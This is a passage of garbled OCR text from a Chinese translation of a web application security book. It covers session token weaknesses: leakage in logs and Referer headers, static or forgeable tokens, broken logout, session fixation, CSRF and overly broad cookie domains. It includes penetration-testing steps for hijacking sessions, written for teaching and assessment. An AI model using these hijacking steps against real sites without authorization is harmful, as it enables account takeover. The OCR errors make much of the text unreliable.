3ET ie: ger_ | | 园 |66.102.15.100 |200 |23,933 |INSC_cmphhfs-fyu=0a1402010050 
GET icssi uttons.css |5SS | ad |66.102.15.100 |200 8484 INSC_cmphhfs-fyu=0al402010050 
GET If?utmww=1&utmn=13.|gif | 图 “|6#233183103 |200 39 | | 
IGET Iapp iptsidom.comrmon.j |: | a |66.102.15.100 |200 B386 INSC_cmphhfs-fyu=0a1402010050 | 引 
|SET Iappiscriptsidetectj S 加 ljs | 国 66 ke 00 |200 19 N cmphhfs-fyu=0a1 40201 0050 
局 | 5 La 四 FT hn ratte ot TT 3 
































图 7-10” 侦 历 应 用 程序 ， 确 认 收 到 新 会 话 令 牌 的 位 置 
(2) 如 果 应 用 程序 使 用 HTTP cookie 传 送 会 话 令 牌 ， 那 么 应 确认 其 是 否 设 置 了 secure 标记 ， 








防止 它们 通过 非 加密 连 接 传 送 令 牌 。 

(3) 在 正常 使 用 应 用 程序 的 情况 下 ， 确 定 会 话 令 牌 是 否 通 过 非 加 密 连 接 传送 。 如 果 确 实 如 
此 ， 应 将 其 视 为 易于 受到 拦截 。 

(4) 如 果 起 始 页 面 使 用 HTTP， 然 后 在 登录 和 站 点 中 通过 验证 的 区 域 转 换 到 HTTPS， 确 认 应 
用 程序 是 否 在 用 户 登 录 后 发 布 一 个 新 令 牌 ， 或 者 在 使 用 HTTP 阶 段 传送 的 令 牌 是 否 仍 被 用 于 追 
踪 用 户 通过 验证 的 会 话 。 同 时 确认 ， 如 果 对 登录 URL 进 行 相应 修改 ， 应 用 程序 是 否 接受 通过 
HTTP 登 录 。 

(5) 即使 应 用 程序 在 每 一 个 页 面 使 用 HTTPS， 确认 服务 器 是 否 还 监 昕 80 端口， 通过 它 运行 
任何 服务 或 内 容 。 如 果 是 这 样 ， 直 接 使 用 通过 验证 的 会 话 访 问 所 有 HTTP URL， 确认 会 话 令 牌 
是 否 被 传送 。 

(6) 如 果 通 过 HTTP 将 通过 验证 会 话 的 令 牌 传送 给 服务 器 ， 确 认 该 令 牌 是 否 继续 有 效 ， 
立即 被 服务 器 终止 。 


尝试 访问 
http://mdsec.net/auth/369/ 


http://mdsec.net/auth/372/ 
http://mdsec.net/auth/374/ 
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7.3.2 ”在 日 志 中 泄露 令 牌 


除 在 网 络 通信 中 明文 传送 会 话 令 牌 外 , 各 种 系统 日 志 也 常常 将 令 牌 泄露 给 未 授权 方 。 虽然 这 
种 情况 很 少 发 生 , 但 由 于 除了 处 在 网 络 适 当 位 置 的 镭 听 者 之 外 , 还 有 其 他 各 种 潜在 的 攻击 者 都 能 
查阅 这 些 日 志 ， 这 种 泄露 通常 会 造成 更 严重 的 后 来。 

许多 应 用 程序 为 管理 员 和 其 他 支持 人 员 提 供 监 控 和 控制 应 用 程序 运行 时 状态 ( 包括 用 户 会 
话 ) 的 功能 。 例 如， 帮助 用 户 解决 疑难 的 服务 台 工 作 人 员 可 能 会 要 求 用 户 提供 用 户 名 、 通 过 列表 
0 E 定 位 他 们 当前 的 会 话 , 并 查看 与 会 话 有 关 的 细 方 。 或 者 省 理 员 可 能 会 在 调查 一 起 违反 

0 中 查询 最 近 会 话 的 日 志 记 录 。 通 党 ,这 种 监控 和 控制 功能 会 泄露 每 个 会 话 的 令 牌 。 

这 种 功能 一 般 没 有 得 到 恨 好 的 保护 ， 人 允许 未 授权 用 户 访问 当前 会 话 令 牌 列表 ， 因 而 支持 所 
本 和 用 程序 用 户 的 会 话 。 

会 话 令 牌 出 现在 系统 日 志 中 的 另 一 个 主要 原因 是 应 用 程序 使 用 URL 查 询 字 符 串 , 而 不 是 使 用 
HTTP cookie 或 PosT 请 求 主 体 作为 令 牌 传输 机 制 。 例 如 ， 在 Google 上 查询 inurl:jsessionid 有 即 
可 确定 数 千 个 在 以 下 URL 中 传送 Java 平 台 会 话 令 牌 ( 称 作 jsessionid ) 的 应 用 程序 : 

http:/www.webjunction.org/do/Navigation;jsessionid= 

F27ED2A6AAE4C6DA409A3044E79B8B48?category=327 

如 末 应 用 程序 以 这 种 方式 传送 会 话 令 牌 , 它们 的 会 话 令 牌 就 可 能 出 现在 各 种 未 授权 用 户 能 够 
访问 的 系统 日 志 中 ， 例 如 : 

口 用 户 训 览 硕 的 日 六; 

口 Web 服 务 硕 日志; 

口 企业 或 TSP 代 理 服 务 硕 日 志 ; 

口 任何 在 应 用 程序 主机 环境 中 采用 的 反 回 代理 的 日 志 ; 

口 应 用 程序 用 户 通 过 单 击 站 外 链接 访问 的 任何 服务 带 的 Referer 日 志 ， 如 图 7-11 所 示 。 


3 burp suite v1.01 professional _ 访 ID| x] 


burp intruder repeater window help 


















































proxy spider | intruder | repeater | comms | alerts | 








intercept options | history | 


gd reduestto http:iipagead2.googlesyndication.com:80 








forward | intercept on | action | ®) text OO param © hex 








GET /ipadgeadishow_ads.js HTTP/1.1 

ACcept: zx 六 -一 一 一 一 一 
Referer httpwww wingentaconnectcomjjsessione=akhqhgd1q.alice 六 
AcceptLanguadge: en-gb,en-us:d=0.5 A 
UA-CPLU: x86 

Accept-Encoding: ygzip, deflate 

thiodified-Since: wed 17 Jan 2007 02:39:02 GhT. length=7170 
User-Agent: hiozillaid#.0 tcompatible; MSIE 7.0, VWindows NTS5 .NET CLR 2.0.50727FDM InfoPath.1) 
Host pagead2.go0glesyndication.com 

Proxy-Connection: Keep-Alive 

Pragma: no-cache 








| omatches 














图 7-11 ” 当 会 话 令 牌 出 现在 URL 中 时 ， 只 要 用 户 点 击 站 外 链接 或 浏览 紫 加 载 站 外 资源 ， 
会 话 令 牌 就 会 在 Referer 消 息 头 中 传送 
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即使 整个 应 用 程序 都 使 用 HTTPS， 这 些 漏 洞 仍 有 可 能 出 现 。 

上 面 描述 的 最 后 一 种 情况 为 攻击 者 提供 了 一 种 截获 应 用 程序 会 话 令 牌 的 非常 有 效 的 方法 。 例 
如 ,如果 一 个 Web 邮 件 应 用 程序 在 URL 中 传送 会 话 令 牧 ， 那么 攻击 者 就 可 以 同 应 用 程序 的 用 户 发 
送 一 封 电 子 邮 件 , 在 里 面包 含 一 个 连接 到 他 控制 的 Web 服 务 表 的 链接 。 如 于 任 何 用 户 访问 这 个 链 
接 〈 如 单 击 它 ， 或 者 他 们 的 浏览 融 加 载 了 包含 在 HTML 格式 的 电子 邮件 中 的 图 像 ) ， 攻 击 者 就 会 
实时 收 到 该 用 户 的 会 话 令 脾 。 然 后 , 攻击 者 只 需 在 他 的 服务 带 上 运行 一 段 脚 本 ,就 可 以 壳 持 每 一 
个 令 脾 的 会 话 ， 并 执行 菏 种 恶意 操作 ， 如 发 送 垃圾 邮件 、 获 取 个 人 信息 或 修改 密码 。 























注解 ”追踪 通过 HTTPS 访 问 的 页 面 中 包含 的 站 外 链接 时 ， 当 前 版 本 的 Internet Explorer 
中 并 不 包含 Referer 消 息 头 。 在 这 种 情况 下 ， 只 要 站 外 链接 也 通过 HTTPS 访 问 ， 即 使 它 
属于 另 一 个 域 ，Firefox 中 也 包含 Referer 消 息 头 。 因 此 ， 即 使 使 用 SSL， 揪 入 在 URE 中 的 


敏感 数据 也 容易 在 Referer 日 志 中 泄露 。 





渗透 测试 步 又 

(1) 确定 应 用 程序 的 所 有 功能 ， 找 出 可 碍 看 会 话 令 牌 的 任何 日 志 或 监控 功能 。 碍 明 谁 能 够 
访问 这 种 功能 ， 例 如 管理 员 、 任 何 通过 验证 的 用 户 或 匿名 用 户 。 请 参阅 第 4 章 了 解 发 现在 主 应 
用 程序 中 没有 建立 直接 链接 的 隐藏 内 容 的 技巧 。 

(2) 确定 应 用 程序 使 用 URL 中 传送 会 话 令 牌 的 任何 情况 。 可 能 应 用 程序 通常 以 更 加 安全 的 
方式 传送 令 牌 ， 但 开发 者 在 特定 情况 下 使 用 URL 来 解决 特殊 难题 。 例 如 ，Web 应 用 程序 与 外 部 
系统 交互 时 通常 会 出 现 这 种 情况 。 

(3) 如 有 果 应 用 程序 在 URL 中 传送 会 话 令 牌 ， 尝试 发 现任 何 允 许 在 其 他 用 户 查 阅 的 页 面 中 注 
入 任意 站 外 链接 的 应 用 程序 功能 ， 例 如 公告 牌 、 妆 点 反 饿 、 问 与 答 等 功能 。 如 采 可 以 ， 辐 一 个 
受 控 制 的 Web 服 务 硕 提交 链接 , 等 待 一 段 时 间 , 看 Referer 日 志 中 是 否 收 到 任何 用 户 的 会 话 令 牌 。 

(4) 如 果 截 获 到 任何 会 话 令 脾 ， 尝 试 通过 正常 使 用 应 用 程序 ， 而 不 是 用 截获 的 令 牌 代 符 目 
已 的 令 脾 来 支持 用 户 的 会 话 。 可 以 通过 拦截 服务 侣 返回 的 下 一 个 啊 应 ， 并 使 用 截 医 的 cookie 值 
谎 加 目 己 的 set-Ccookie 消 息 头 , 以 实现 这 一 目的 。 在 Burp 中 , 可 以 应 用 一 个 Suite 范 围 的 配置 ， 
在 所 有 指 回 目 标 应 用 程序 的 请 求 中 设置 一 个 特殊 cookie， 以 便 测 试 期 间 在 不 同 的 会 话 之 间 轻 松 
切换 。 

(5) 如 采 鹤 获 到 大 量 令 牌 ， 并 且 通 过 劫持 用 户 的 会 话 可 以 访问 他 们 的 敏感 数据 〈 如 个 人 将 
料 、 文 付 信息 或 用 户 密 码 )， 就 能 够 使 用 第 14 章 描述 的 目 动 技 巧 获得 想 要 的 、 属 于 其 他 应 用 程 
序 用 户 的 数据 。 



































尝试 访问 
http://mdsec.net/auth/379/ 
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7.3.3 令 牌 -会 话 映 射 易 受 攻 击 


由 于 应 用 程序 在 将 生成 和 处 理 的 会 话 令 牌 与 令 牌 所 属 的 用 户 会 话 之 间 进 行 对 应 的 过 程 中 存 
在 注 弱 环节 ， 会 话 管理 机 制 因 此 存在 各 种 稼 见 的 漏洞 。 

最 简单 的 漏洞 是 允许 给 同一 个 用 户 账 户 同 时 分 配 几 个 有 效 的 令 牌 。 在 几乎 每 一 个 应 用 程序 
中 , 任何 用 户 都 没有 正当 理由 在 任何 指定 的 时 间 拥 有 多 个 会 话 。 当 然 , 用 户 可 以 终止 一 个 处 于 活 
动 状态 的 会 话 , 再 开始 一 个 新 会 话 , 这 很 第 见 , 例如 , 关闭 浏览 融 窗 口 或 转换 到 另 一 侣 计算机 上 。 
但 是 ,如 采 一 名 用 户 明 显 同时 在 使 用 两 个 不 同 的 会 话 , 这 通常 表示 出 现 了 安全 问题 : 要 么 是 因为 
用 户 将 证 书 泄露 给 了 第 三 方 , 要 么 是 攻击 者 通过 其 他 某 种 途径 获得 了 他 的 证 书 。 无 论 发 生 哪 一 种 
情况 ， 都 不 应 允许 并 行 会 话 ， 因 为 它 允 许 用 户 持 续 执 行 任何 非法 操作 ， 同 时 允许 攻击 者 使 用 截获 
的 证 书 ， 却 不 存在 被 检测 出 来 的 风险 。 

应 用 程序 使 用 “ 毅 态 ” 令 牌 是 一 种 相对 较为 特殊 的 缺陷 。 这 些 “ 令 牌 ” 看 似 会 话 令 牌 ， 最 初 
表现 的 功能 和 会 话 令 牌 一 样 , 但 实际 并 非 如 此 。 在 这 些 应 用 程序 中 , 每 名 用 户 都 分 配 有 一 个 令 牌 ， 
并 且 用 户 每 次 登录 ,都 收 到 相同 的 令 牌 。 无 论 用 户 是 否 已 经 登录 并 获得 令 牌 ,应 用 程序 都 应 将 该 
令 和 脾 视 为 有 效 令 牌 。 这 种 应 用 程序 实际 上 是 对 会 话 的 整体 概念 以 及 这 样 做 有 助 于 管理 和 控制 应 用 
程序 访问 存 有 误解 。 有 些 时 候 ， 应 用 程序 这 样 运作 ， 是 为 了 执行 设计 上 存在 缺陷 的 “ 记 住 我 ” 功 
能 ， 并 因此 将 静态 令 牌 保存 在 一 个 持久 性 cookie 中 (请 参阅 第 6 音 了 解 相关 内 容 )。 有 时 ， 令 牌 本 
号 易于 受到 预测 攻击 , 致使 这 种 漏洞 造成 更 加 严重 的 后 果 , 因为 一 次 成 功 的 攻击 不 仅 能 够 攻破 当 
前 登录 用 户 的 会 话 ， 如 采 时 间 人 允许 ， 还 能 攻破 所 有 注册 用 户 的 账户 。 

我 们 偶尔 也 会 观察 到 应 用 程序 表现 出 其 他 奇怪 的 行为 ,表明 令 牌 和 会 话 之 间 的 对 应 关系 存在 基 
本 的 缺陷 。 根 据 用 户 名 和 一 个 随机 成 分 构造 的 有 意义 令 牌 就 是 一 个 典型 的 示例 。 以 下 面 的 令 牌 为 例 : 

qdXN1cjILIkYWY7cJjE9MTMwOTOxODEYMTMONTKwMTI= 
对 其 进行 Base64 编 码 ， 得 到 : 

user=daf;r1=13094181213459012 

对 成 分 rl 进行 仔细 分 析 后 ,我 们 可 以 得 出 结论 : 根据 样本 值 无 法 对 其 进行 了 预测。 然而， 如果 
应 用 程序 的 会 话 处 理 逻 辑 存 在 缺陷 ， 可 能 攻击 者 只 需 问 rl1 和 user 提 交 任 何 有 效 的 值 ， 就 可 以 在 
指定 用 户 的 权限 下 访问 一 个 会 话 。 从 本 质 上 讲 , 这 是 一 个 访问 控制 漏洞 ， 因 为 应 用 程序 是 根据 用 
户 在 会 话 之 外 提交 的 数据 做 出 的 访问 决定 ( 请 参阅 第 8 章 了 解 相 关内 容 )。 产生 这 种 漏洞 是 因为 应 
用 程序 使 用 会 话 令 牌 表明 请 求 者 已 经 与 应 用 程序 建立 某 种 有 效 的 会 话 ; 然而 , 处 理会 话 的 用 户 权 
限 并 不 由 会 话 控制 ， 而 是 通过 其 他 方式 根据 每 个 请 求 决定 。 在 这 种 情况 下 ， 请 求 者 百 接 欣 制 决 定 
用 户 权 限 的 方式 。 


































































































渗透 测试 步 又 


(1) 用 相同 的 用 户 账户 从 不 同 的 训 览 融 进 程 或 从 不 同 的 计算 机 两 次 登录 应 用 程序 。 确 定 这 














两 个 会 话 是 否 痢 处 于 活动 状态 。 如 果 是 , 表示 应 用 程序 支持 并 行 会 话 ， 这样 攻破 其 他 用 户 证 书 
的 攻击 者 能 够 利用 这 些 证 书 ， 而 不 会 有 被 检测 出 来 的 风险 。 
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(2) 用 相同 的 用 尸 账户 从 不 同 的 浏览 从 进程 或 从 不 同 的 计算 机 几 次 登录 和 退出 应 用 程序 。 
硝 定 应 用 程序 在 每 次 登录 时 是 发 布 一 个 新 会 话 令 牌 , 还 是 发 布 相同 的 令 牌 。 如 果 每 次 发 布 相同 
的 令 牌 ， 那 么 应 用 程序 根本 没有 正确 使 用 令 牌 。 

(3) 如 条 令 牌 明显 包含 茶 种 结构 和 意义 , 设法 将 标识 用 户 身 份 的 成 分 与 无 法 辨别 的 成 分 区 分 
开 来 。 尝 试 修改 所 有 与 用 户 有 关 的 令 牌 成分， 使 其 指向 其 他 已 知 的 应 用 程序 用 户 ， 确 定 修 改 后 
的 令 牌 是 否 被 应 用 程序 接受 ， 以 及 是 否 能 够 让 攻击 者 伪 痿 成 那 名 用 户 。 














尝试 访问 
http://mdsec.net/auth/382/ 
http://mdsec.net/auth/385/ 


7.3.4 ”会 二 终止 罗 受 攻击 


由 于 两 方面 的 原因 ， 正 确 终止 会 话 非 常 重要 。 首 先 ， 尽 可 能 缩短 一 个 会 话 的 寿命 可 降低 攻击 
者 截获 、 猜 测 或 滥用 有 效 会 话 令 牌 的 可 能 性 。 其 次 ， 如 采用 户 不 再 需要 现 有 会 话 ,， 终止 会 话 为 用 
户 提供 一 种 使 其 失效 的 途径 , 在 进一步 降低 上 述 可 能 性 的 同时 , 在 某 种 程度 上 确保 共享 计算 环境 
中 会 话 的 安全 。 会 话 终止 功能 的 主要 缺陷 大 都 与 无 法 满足 这 两 个 关键 目标 有 关 。 
一 些 应 用 程序 并 不 实施 有 效 的 会 话 终 止 功能 。 会 话 一 旦 建立 ， 它 在 收 到 最 后 请 求 后 的 许多 天 
内 也 仍然 有 效 ， 卫 到 服务 右 最 终 将 其 清除 。 即 使 令 牌 存在 某 种 非常 难以 利用 的 缺陷 ( 例如， 确定 
每 个 有 效 令 牌 需要 100 000 次 猜测 )， 攻 击 者 仍然 能 够 截获 最 近 访 问 应 用 程序 的 每 一 名 用 户 的 令 牌 。 
一 些 应 用 程序 并 不 提供 有 效 的 退出 功能 。 
口 有 些 时 候 ， 应 用 程序 根本 不 执行 退出 功能 。 用 户 没 有 办 法 要 求 应 用 程序 终止 他 们 的 会 话 。 
口 有 些 时 候 ， 退 出 功能 实际 上 并 不 能 帮助 服务 硕 终 止 会 话 。 即 使 服务 硕 从 用 户 的 浏览 硕 中 
删除 令 牌 〈 例 如， 通过 发 布 一 个 清空 令 牌 的 set-Ccookie 指 令 )。 然 而 ， 如 采用 户 继续 提 
交 这 个 令 牌 ， 服 务 融 仍然 接 妥 它 。 
口 最 糟糕 的 情况 : 当 用 户 单 击 “ 退 出 ”按钮 时 ， 应 用 程序 并 不 与 服务 天 通信 ， 因 此 服务 大 不 
采取 任何 行动 。 相 反 ， 应 用 程序 执行 一 段 洛 户 端 脚本 清空 用 户 的 cookie， 在 随后 的 请 求 中 
将 用 户 返 回 到 登录 页 面 。 访问 这 个 cookie 的 攻击 者 就 能 使 用 会 话 , 好 像 用 户 从 未 退出 一 样 。 



























































渗透 测试 步骤 
(1) 不 要 掉 入 检查 应 用 程序 对 客户 端 令 牌 执行 的 操作 ( 如 通过 一 个 新 的 Set-Cookie 指 令 、 
客户 六 脚本 或 者 终止 时 间 属 性 令 cookie 失 戏 ) 的 陷阱 。 在 客户 端 浏 览 硕 内 对 令 牌 执行 的 任何 操 











作 并 不 能 终止 会 话 。 相 反 ， 调 查 服 务 表 喘 是 否 执行 会 话 终 止 操作 。 
(a) 登录 应 用 程序 获得 一 个 有 效 令 牌 。 
(b) 不 使 用 这 个 令 牌 , 等 竺 一 段 时 间 后 , 使 用 这 个 令 牌 提交 一 个 访问 受 保护 页 面 ( 如 “我 
的 资料 ”页 面 ) 的 请 求 。 
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(c) 如 采 该 页 面 正 常 显示， 表示 令 牌 仍然 处 于 活动 状态 。 
(d) 使 用 反复 试验 的 方法 确定 会 话 终止 超时 时 间 ， 或 者 一 个 令 牌 在 最 后 一 次 使 用 它 提 交 
请 求 几 天 后 是 否 仍 被 使 用 。 可 配置 Burp Intruder 递 增 连 续 请 求 之 间 的 时 间 间 隔 ， 自 动 
完成 这 项 任务 。 
(2) 确定 是 否 存 在 退出 功能 ， 用 户 是 否 能 够 使 用 这 一 功能 。 如 果 不 能 ， 表 示 用 户 更 易于 受 
到 攻击 ， 因 为 他 们 没有 办 法 让 应 用 程序 终止 会 话 。 
(3) 如 有 果 应 用 程序 提供 退出 功能 ， 测 试 其 效率 。 退 出 后 ,尝试 重新 使 用 原 有 的 令 牌 确定 
其 是 否 仍然 有 效 。 如 果 令 有 牌 仍然 有 效 ， 那 么 即使 用 户 已 经 “退出 ”， 也 依然 易于 受到 会 话 支持 
攻击 。 可 以 使 用 Burp Suite 测 试 此 功能 的 效率 ， 具 体操 作 如 下 : 从 代理 服务 器 历史 记录 中 选择 
一 个 依赖 会 话 的 最 近 请 求 ， 在 从 应 用 程序 中 注销 后 将 其 发 送 给 Burp Repeater 重 新 发 布 该 请 求 。 


























尝试 访问 
http://mdsec.net/auth/423/ 
http://mdsec.net/auth/439/ 
http://mdsec.net/auth/447/ 
http://mdsec.net/auth/452/ 
http://mdsec.net/auth/457/ 


7.3.5 ”客户 端 暴露 在 令 牌 动 持 风险 之 中 


攻击 者 可 以 采用 各 种 方法 回应 用 程序 的 其 他 用 户 发 动 攻 击 , 试图 规 获 或 滥用 他 们 的 会 话 令 牌 。 

口 攻击 者 可 通过 里 站 点 脚本 攻击 查询 用 户 的 cookie， 获得 他 们 的 会 话 令 牧 , 然后 将 其 传送 至 
目 己 控制 的 任意 服务 大 。 第 12 草 将 详细 介绍 这 种 攻击 。 

口 攻击 者 可 以 使 用 其 他 针对 用 户 的 攻击 ， 以 不 同 的 方式 支持 用 户 的 会 话 。 这 包括 实施 会 话 
固定 攻击 ， 即 攻击 者 癌 一 名 用 户 发 送 一 个 已 知 的 会 话 令 有 牌 等待 他 登录 ， 然 后 动 持 他 的 
会 话 ; 以 及 跨 站 点 请 求 伪 造 攻击 , 其 中 攻击 者 从 他 控制 的 一 个 Web 站 点 回应 用 程序 提出 一 
个 专门 设计 的 请 求 ， 由 于 用 户 的 浏览 帮 会 随同 这 个 请 求 一 起 目 动 提交 用 户 当 前 的 cookie， 
攻击 者 因此 会 获得 用 户 的 cookie。 这 些 攻 击 也 请 参阅 第 12 章 的 介绍 。 





















































渗透 测试 步 又 


(1) 硝 定 应 用 程序 中 存在 的 任何 蜂 站 点 脚本 漏洞 ， 看 是 否 可 以 利用 这 些 狂 洞 蕉 获 其 他 用 户 








的 会 话 令 牌 〈 请 参阅 第 12 音 了 解 相关 内 容 )。 

(2) 如 果 应 用 程序 向 未 通过 验证 的 用 户 发 布 令 牌 ， 就 会 获得 一 个 令 牌 并 进行 一 次 登录 。 如 
果 应 用 程序 在 攻击 者 登录 后 并 不 发 布 一 个 新 令 牌 ， 就 表示 它 易于 受到 会 话 固定 攻击 。 

(3) 即使 应 用 程序 并 不 回 未 通过 验证 的 用 户 发 布 会 话 令 牌 , 仍然 会 通过 登录 获得 一 个 令 牌 ， 
然后 返回 登录 页 面 。 如 果 应 用 程序 “愿意 ”返回 这 个 页 面 ， 即 使 攻击 者 已 经 通过 验证 ,那么 也 
可 以 使 用 相同 的 令 牌 以 另 一 名 用 户 的 身份 提交 另 一 次 登录 。 如 果 应 用 程序 在 第 二 次 登录 后 并 不 
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发 布 一 个 新 令 牌 ， 表 示 它 易于 受到 会 话 固定 攻击 。 

(4) 确定 应 用 程序 会 话 令 牌 的 格式 。 用 一 个 格式 有 效 的 伪造 值 修 改 令 牌 ， 然 后 尝试 使 用 它 
登录 。 如 果 应 用 程序 允许 使 用 一 个 捏造 的 令 牌 建立 一 个 通过 验证 的 会 话 , 表示 它 易 于 受到 会 话 
固定 攻击 。 

(5) 如 果 应 用 程序 并 不 支持 登录 功能 ,但 处 理 敏 感 数 据 ( 如 个 人 信息 和 支付 细节 )， 并 在 提 
交 后 显示 这 些 信息 ( 如 在 “确认 订单 ”页 面 上 )， 那 么 使 用 前 面 的 三 种 测试 方法 尝试 访问 显示 
敏感 数据 的 页 面 。 如果 在 匿名 使 用 应 用 程序 期 间 生 成 的 令 牌 可 用 于 获取 用 户 的 敏感 信息 , 那么 
应 用 程序 就 易于 遭受 会 话 固定 攻击 。 

(6) 如 果 应 用 程序 完全 依靠 HTTP cookie 传 送 会 话 令 牌 ， 它 很 可 能 容易 受到 跨 站 点 请 求 伪造 
(CCSRF ) 攻击 。 首先 登录 应 用 程序 。 然 后 , 从 另 一 个 应 用 程序 的 页 面向 应 用 程序 提出 一 个 请 求 ， 
解 认 它 是 否 会 提交 用 户 的 令 牌 。( 必须 从 与 登录 目标 应 用 程序 相同 的 浏览 絮 进 程 窗口 提交 令 
牌 。) 设法 确定 所 有 参数 可 由 攻击 者 提前 决定 的 应 用 程序 敏感 功能 ， 利 用 这 种 缺陷 在 目标 用 户 
的 权限 下 执行 未 授权 操作 。 请 参阅 第 13 章 了 解 实 施 CSRF 攻 击 的 详情 。 





















































7.3.6 ”宽泛 的 cookie 范 围 


cookie 的 工作 机 制 可 人 简单 概括 如 下 : 服务 需 使 用 HTTP 啊 应 消息 头 Set-cookie 发 布 一 个 
cookie， 然 后 浏览 融 在 随后 的 请 求 中 使 用 cookie 消 息 头 回 同 一 合 服务 做 重新 提交 这 个 cookie。 事 
实 上 ， 事 情 远 比 这 复杂 。 

cookie 机 制 允 许 服务 需 指 定 将 每 个 cookie 重 新 提交 到 哪个 域 和 哪个 URL 路 径 。 为 完成 这 一 任 
务 ， 它 在 set-cookie 指 邻 中 使 用 aomain 和 path 属 性 。 

1. cookie 域 限制 

位 于 foo .wahh-app .com 的 应 用 程序 建立 一 个 cookie 后 ,浏览 器 会 默认 在 随后 的 所 有 请 求 中 
将 cookie 重 新 提交 到 foo .wahh-app.com 及 任何 子 域 ( 如 admin. foo.wahh-app.com) 中 。 它 
不 会 将 cookie 提 交 给 其 他 任何 域 ,包括 父 域 vanh-app .com 和 父 域 的 其 他 任何 子 域 ,如 bar .wahh- 
app .como。 

服务 器 可 以 在 set-cookie 指 令 中 插入 一 个 aomain 属 性 ,以 改变 这 种 默认 行为 。 例 如 , 假设 
位 于 foo .wahh-app .com 的 应 用 程序 返回 以 下 HTTP 消 息 头 : 

Set-cookie: sessionId=19284710; domain=wahh-app .com; 


浏览 吉 会 将 这 个 cookie 重 新 提交 给 wahh-app .com 的 所 有 子 域 ,包括 bar .wahh-app .com。 











注解 ”服务 器 不 能 使 用 这 个 属性 随意 指定 域 。 首 先 ， 指 定 的 域 要 么 必须 是 应 用 程序 在 其 
上 运行 的 域 ， 要 么 是 它 的 父 域 (或 为 直接 父 域 ， 或 有 一 定 间隔 )， 其 次 ， 指 定 的 域 不 能 


为 .com 或 .co.uk 之 类 的 顶级 域 ， 因 为 这 样 做 会 允许 恶意 服务 器 在 其 他 任何 域 上 建立 任 
意 cooKie。 如 果 服 务 器 违反 以 上 任何 一 条 规定 ， 浏 览 器 将 完全 忽略 Set-cookie 指 令 。 
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如 果 应 用 程序 将 cookie 范 围 设 定 得 过 于 宽泛 ， 也 可 能 会 使 应 用 程序 出 现 各 种 安全 漏洞 。 

以 一 个 允许 用 户 注 册 、 登 录 、 写 博客 文 草 、 阅 读 他 人 博客 的 博客 应 用 程序 为 例 。 它 的 主 应 用 
程序 位 于 域 wahh- blogs .com 上 ， 当 用 户 登 录 这 个 应 用 程序 时 ， 他 会 从 一 个 以 这 个 域 为 范围 的 
cookie 中 收 到 会 话 令 牌 。 每 名 用 户 都 可 以 创建 自己 的 博客 ， 通 过 以 用 户 名 为 前 绥 的 一 个 新 的 子 域 
进行 访问 ， 例 如 : 


herman.wahh-blogs.com 

















solero.wahh-blogs.com 
因为 cookie 被 目 动 重新 提交 到 这 个 范围 内 的 每 一 个 子 域 ， 当 一 名 已 经 登录 的 用 户 浏览 其 他 用 
户 的 博客 时 , 他 的 会 话 令 牌 将 与 其 请 求 一 起 提 区 。 如 采 人 允许 博客 作者 在 他 们 目 己 的 博客 中 插入 任 
意 JavaScript 脚 本 〈 就 像 现 在 的 许多 博客 应 用 程序 那样 )， 那 么 一 个 恶意 博客 作者 就 能 够 以 和 保存 
型 跨 站 点 脚本 攻击 一 样 的 方式 甸 取 其 他 用 户 的 会 话 令 牌 (请 参阅 第 12 划 了解 相 关内 容 )。 

之 所 以 会 出 现 这 样 的 问题 , 是 因为 用 户 创 作 的 博客 是 处 理 验 证 和 会 话 管 理 的 主 应 用 程序 的 子 
域 。HTTP cookie 并 没有 能 力 帮 助 应 用 程序 防止 主 域 发 布 的 cookie 被 重新 提交 给 它 的 子 域 。 

要 解决 这 个 问题 ， 主 应 用 程序 可 以 使 用 一 个 不 同 的 域名 ( 如 www . wahh-blogs. com )， 并 以 

个 完全 合格 的 域名 为 它 的 会 话 令 牌 cookie 的 域 范围 。 这样 , 如 有 果 登 录用 户 浏览 其 他 用 户 的 博客 ， 
会 话 cookie 就 不 会 被 提交 。 

如 果 一 个 应 用 程序 明确 以 一 个 父 域 作为 它 的 cookie 域 范围 ,就 会 出 现 这 种 漏洞 的 男 一 个 版 本 。 
例如 ， 假设 一 个 安全 性 至 关 重 要 的 应 用 程序 位 于 域 sensitiveapp.wahh-organization.com 
上 ， 当 它 建立 cookie 时 ， 它 自由 设置 的 域 范围 如 下 : 

Set-cookie: sessionId=12df098ad809a5219; domain=wahh-organization.com 

这 样 做 造成 的 后 果 是 : 当 用 户 访问 wahh-organization.com 使 用 的 每 一 个 子 域 时 ， 机 密 应 用 程 
序 的 会 话 令 牌 cookie 都 将 被 提交 。 这 些 子 域 包括 : 


Www .wahh—-organization.com 


























testapp .wahh-organization.com 
虽然 这 些 应 用 程序 可 能 全 者 属于 拥有 机 密 应 用 程序 的 同一 组 织 , 但 由 于 以 下 原因 , 不 应 将 敏 
感应 用 程序 的 cookie 提 交 给 其 他 应 用 程序 。 

口 负责 其 他 应 用 程序 的 人 员 与 负责 机 蜜 应 用 程序 的 人 员 的 信任 级 别 不 同 。 

口 与 前 面 的 博客 应 用 程序 一 样 , 其 他 应 用 程序 的 功能 可 能 会 将 提交 给 应 用 程序 的 cookie 值 港 
露 给 第 三 方 。 

口 其 他 应 用 程序 可 能 并 不 像 机 密 应 用 程序 那样 遭 循 同样 严格 的 安全 标准 ， 或 者 接受 全 面 的 
安全 测试 〈 因 为 它们 不 够 重要 、 并 不 处 理 敏 感 数据 ， 或 者 仅 为 测试 目的 而 建立 )。 应 用 程 
序 中 存在 的 许多 漏洞 〈 例 如 鉴 站 点 脚本 漏洞 ) 可 能 不 会 影响 它们 的 安全 状况 ， 但 外 部 攻 
击 者 却 可 以 利用 一 个 不 安全 的 应 用 程序 截获 由 机 蜜 应 用 程序 创建 的 会 话 令 牌 。 
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注解 ”通常 而 言 ， 基 于 域 的 cooKkie 隔 离 并 不 像 同 源 策略 (请 参阅 第 3 章 ) 那样 严格 。 除 
了 在 处 理 主机 名 时 讨论 的 问题 外 ， 浏 览 器 还 会 在 确定 cookie 范 围 时 忽略 协议 和 端口 号 。 
如 果 某 个 应 用 程序 与 另 一 个 不 可 信 的 应 用 程序 共享 主机 名 ， 并 依赖 协议 或 端口 号 中 的 


差异 来 隔离 自身 ,那么 , 攻击 者 通过 处 理 cookie 即 可 轻而易举 地 破坏 这 种 隔离 。 该 应 用 
程序 发 布 的 任何 cookie 都 可 被 与 它 共 享 主机 名 的 不 可 信和 应 用 程序 访问 。 





渗透 测试 步骤 

审查 应 用 程序 发 布 的 所 有 cookie， 检 查 用 于 控制 cookie 旋 围 的 任何 qomain 属 性 。 

